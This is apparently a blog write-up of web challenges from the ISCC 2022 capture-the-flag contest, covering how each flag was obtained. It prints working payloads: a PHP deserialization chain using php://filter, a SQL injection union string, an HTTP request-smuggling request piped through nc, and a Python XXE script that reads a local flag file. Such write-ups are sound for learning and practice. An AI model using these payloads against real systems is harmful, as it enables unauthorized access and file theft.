ISCC2022WP--WEB

Web1-冬奥会

解题步骤

打开靶机后,通过阅读界面PHP代码进行审计,得出payload后得解

具体描述

打开靶机

 

通过分析PHP代码进行代码审计,得到payload:http://59.110.159.206:7060/?Information={%22year%22:%222022a%22,%22items%22:[%22skiin%22,%20[%22test%22],%200]}

 

【当满足代码中的两个条件之时,界面会打印出flag】

 

解题收获

通过分析php代码,了解了基本的php代码含义

 

Web3-pop2022

解题步骤

打开靶机后,依然是php代码审计,发现与反序列化有关,进行求解,得出字符串后用base64进行解码

具体描述

打开后通过反序列化得出payload:

http://59.110.159.206:7050/?wish=O%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3BO%3A12%3A%22Road_is_Long%22%3A2%3A%7Bs%3A4%3A%22page%22%3Bs%3A3%3A%22aaa%22%3Bs%3A6%3A%22string%22%3BO%3A13%3A%22Make_a_Change%22%3A1%3A%7Bs%3A6%3A%22effort%22%3BO%3A13%3A%22Try_Work_Hard%22%3A1%3A%7Bs%3A3%3A%22var%22%3Bs%3A57%3A%22php%3A%2F%2Ffilter%2Fread%3Dconvert.base64-encode%2Fresource%3Dflag.php%22%3B%7D%7D%7Ds%3A6%3A%22string%22%3BN%3B%7D

 

 

最后通过base64解码得出flag

解题收获

学习到了php反序列化的相关知识

 

Web4- Easy-SQL

解题步骤

通过SQL注入得出flag

具体描述

打开靶机

 

 

先想到是否需要SQL注入,通过?id=1得到一些数据,通过POST传入【username=admin' union select 'admin','admin','admin'#&passwd=admin】得到flag

解题收获

学习到了布尔盲注和利用burp suite进行POST传参

 

Web5-让我康康

解题步骤

请求走私漏洞

参考文章:http://www.hackdig.com/10/hack-519692.html

多次复现得到payload

具体描述

Payload :

echo -en "GET / HTTP/1.1\r\nHost: localhost\r\nContent-Length: 90\r\nSec-Websocket-Key1: x\r\n\r\nxxxxxxxxGET /fl4g HTTP/1.1\r\nHost: localhost\r\nsecr3t_ip:127.0.0.1\r\nContent-Length: 55\r\n\r\nGET / HTTP/1.1\r\nHost: 127.0.0.1:80\r\n\r\n" | nc 59.110.159.206 7020

 

通过kali终端运行拿到flag

 

解题收获

学习了WAF防火墙绕过,请求走私漏洞

 

Web6-findme

解题步骤

打开靶机,文件包含获得flag

具体描述

Payload: http://59.110.159.206:8030/flllHL91244ggg-SecR1et.txt

获取flag

解题收获

学习了文件包含

 

 

Web7-这是一道代码审计题

解题步骤

通过脚本获取payload来得到flag

具体描述

Payload  python脚本

 

url = 'http://59.110.159.206:8040/mti3ljaumc4x/codelogin'
cookie = 'login=1; a_cookie=aW4gZmFjdCBjb29raWUgaXMgdXNlZnVsIQ=='
payload = &apos;&apos;&apos;<?xml version = "1.0"?><!DOCTYPE ANY [<!ENTITY foo SYSTEM "file:///app/flag.txt">]><user><name>&foo;</name><password>pysnow</password></user>&apos;&apos;&apos;
data = {&apos;data&apos;: payload}
r = requests.post(url, data=payload, headers={&apos;Content-Type&apos;: &apos;text/xml&apos;})
print(r.text)

 

 

 

打开题目进入index路由,将cookie:login=0改为1,然后get传参url=xxx,随便传一个获取到一个提示/static/xx,然后可以发现一大堆emoji表情,直接http://www.atoolbox.net/Tool.php?Id=937上面解码拿到源码,审计源码发现是一个ssrf的题,注意这一串代码

然后可以猜测一下这个addr就是127.0.0.1,编码一下就是MTI3LjAuMC4x,传参url=http://@MTI3LjAuMC4x,可以获得提示

给了一个cookie,然后我们直接带着这个cookie去访问这个路由就行

查看源代码发现很明显是一个xxe,而且这个title提示了flag的位置在./flag.txt里面,可以猜测这个flag的位置就在/app/flag.txt,然后直接x就行,脚本就是最开始写的那一个

 

解题收获

代码审计

 

Web8-爱国敬业好青年

解题步骤

利用burp suite进行POST 传参得到flag

具体描述

 

 

解题收获

POST 传参

posted @ 2022-06-02 16:22  Abyssun  阅读(471)  评论(0编辑  收藏  举报